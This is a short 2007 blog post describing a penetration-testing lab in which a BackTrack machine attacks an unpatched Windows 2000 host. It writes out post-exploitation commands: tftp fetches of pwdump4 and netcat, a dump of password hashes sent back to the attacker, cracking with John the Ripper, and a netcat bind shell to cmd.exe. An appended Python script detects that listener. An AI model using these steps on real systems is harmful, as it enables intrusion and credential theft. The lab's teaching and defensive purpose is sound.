Wednesday, June 27, 2007

Penetration Tester Lab

First of all, you must have your own machine to hack. In this scenario, I'll set up Windows 2000 SP4 and Red Hat Linux 6.2.

This old version of Linux can be downloaded at

Download Redhat 6.2 here

Installing and Securing IIS Servers

The other machine is BackTrack, which is already installed on my hard disk for attacking purposes.
By default, Windows 2000 SP4 is vulnerable to the LSASS exploit, so make sure you patch your machine accordingly. In this lab, I won't patch it, to show how the attack can be done.

Windows 2000 SP4 (Target) - 10.21.11.81
BackTrack (Attacker) - 10.21.11.84

On BackTrack, scan the Windows 2000 SP4 machine using nmap

nmap -sT -O 10.21.11.81
nmap -sV 10.21.11.81 -p 23,25,80
nmap -sU 10.21.11.81

Prepare a wordlist on BackTrack for cracking the dumped hashes later:

cd /pentest/password/dictionaries
gunzip -c wordlist.txt.gz > /tmp/wordlist.txt

Exploit the machine and get a shell.

From the Windows 2000 shell, run

tftp -i 10.21.11.84 get pwdump4.exe
tftp -i 10.21.11.84 get pwdump4.dll
tftp -i 10.21.11.84 get nc.exe
pwdump4 /l /o:pwdump4.txt
tftp 10.21.11.84 put pwdump4.txt

From BackTrack,

cat pwdump4.txt
john -w:wordlist.txt pwdump4.txt
john --show pwdump4.txt
john -w:wordlist.txt -f:NT pwdump4.txt
From Windows, start a listener bound to a shell:

nc -L -p 2111 -e cmd.exe

Then connect to it from BackTrack:

telnet 10.21.11.81 2111
whoami
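A check for the defender's side, added here and not part of the original post: the last step leaves a netcat listener bound to cmd.exe on TCP 2111, which stands out when the target's `netstat -ano` output is correlated with `tasklist`. The sample output below is constructed, and the script assumes IIS on port 80 and the RPC endpoint mapper on port 135 are the only expected listeners on this lab host.

```python
import re

# Constructed sample of `netstat -ano` output (not captured from the lab host).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1120
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       412
  TCP    0.0.0.0:2111           0.0.0.0:0              LISTENING       1876
  TCP    10.21.11.81:2111       10.21.11.84:33021      ESTABLISHED     1876
"""

# Constructed sample of `tasklist` output, used to map PID -> image name.
TASKLIST_SAMPLE = """\
Image Name                   PID Session Name     Session#    Mem Usage
inetinfo.exe                1120 Console                 0      8,124 K
svchost.exe                  412 Console                 0      3,020 K
nc.exe                      1876 Console                 0      1,004 K
"""

# Images that should never own a listening socket on a server.
SUSPECT_IMAGES = {"nc.exe", "netcat.exe", "cmd.exe"}
# Listeners expected on this lab host (assumption): IIS on 80, RPC mapper on 135.
EXPECTED_PORTS = {80, 135}

def parse_tasklist(text):
    """Map PID -> lower-cased image name from tasklist output."""
    pids = {}
    for line in text.splitlines():
        m = re.match(r"^(\S+\.exe)\s+(\d+)\s", line, re.IGNORECASE)
        if m:
            pids[int(m.group(2))] = m.group(1).lower()
    return pids

def find_suspicious_listeners(netstat_text, tasklist_text):
    """Return (port, pid, image, reason) for each TCP listener worth a look."""
    images = parse_tasklist(tasklist_text)
    findings = []
    for line in netstat_text.splitlines():
        m = re.match(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)", line)
        if not m:
            continue
        port, pid = int(m.group(1)), int(m.group(2))
        image = images.get(pid, "<unknown>")
        if image in SUSPECT_IMAGES:
            findings.append((port, pid, image, "shell-capable image owns listener"))
        elif port not in EXPECTED_PORTS:
            findings.append((port, pid, image, "listener on unexpected port"))
    return findings
```

Running find_suspicious_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE) on the samples reports only port 2111, owned by nc.exe; a listener on an unexpected port with an unknown owner is reported on the second rule.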

That's it, and GAME OVER.
